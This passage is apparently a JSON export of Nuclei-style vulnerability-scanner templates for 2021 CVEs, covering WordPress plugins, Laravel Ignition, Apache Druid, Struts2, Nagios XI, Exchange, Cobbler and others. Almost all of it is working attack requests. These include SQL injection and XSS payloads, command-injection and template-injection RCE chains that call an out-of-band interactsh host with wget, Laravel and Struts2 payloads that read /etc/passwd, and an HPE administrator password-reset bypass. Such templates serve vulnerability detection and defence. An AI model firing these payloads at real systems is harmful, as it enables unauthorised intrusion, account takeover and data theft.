application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com&comment=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-33904","info":{"name":"Accela Civic Platform <=21.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["\"k3woq\"^confirm(document.domain)^\"a2pbrnzx5a9\"","servProvCode"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24320","info":{"name":"WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/wp-content/themes/bello/readme.txt"],"stop-at-first-match":true,"matchers":[{"type":"word","internal":true,"words":["wp-content/themes/bello/fonts","bold-themes.com/bello"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send","top.postMessage("],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26855","info":{"name":"Microsoft Exchange Server SSRF Vulnerability","severity":"critical"},"requests":[{"raw":["GET /owa/auth/x.js HTTP/1.1\nHost: {{Hostname}}\nCookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40972","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[mail]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-24495","info":{"name":"Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>","{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><svg/onload=alert('{{randstr}}')>","alert(/{{randstr}}/)"],"condition":"or"},{"type":"word","words":["Marmoset Viewer"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24746","info":{"name":"WordPress Sassy Social Share Plugin <3.3.40 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts","{{BaseURL}}/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["?a\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"slug","group":1,"regex":["\"slug\":\"([_a-z-A-Z0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-24452","info":{"name":"WordPress W3 Total Cache <2.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=w3tc_extensions&extension='-alert(document.domain)-' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, 'extensions/\\'-alert(document.domain)-\\'') && contains(body_2, 'w3-total-cache')","contains(header_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-30213","info":{"name":"Knowage Suite 7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22005","info":{"name":"VMware vCenter Server - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\ntest_data\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 201","contains(body_1, 'VMware vSphere')","content_length_2 == 0"],"condition":"and"}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38146","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/home/download"],"headers":{"Content-Type":"application/json"},"body":"{\n  \"SearchString\": \"C:/Windows/Win.ini\",\n  \"Msg\": \"\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","words":["[fonts]","[extensions]","[files]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24979","info":{"name":"Paid Memberships Pro < 2.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")","contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32819","info":{"name":"Nodejs Squirrelly - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Wget"]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24364","info":{"name":"WordPress Jannah Theme <5.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code 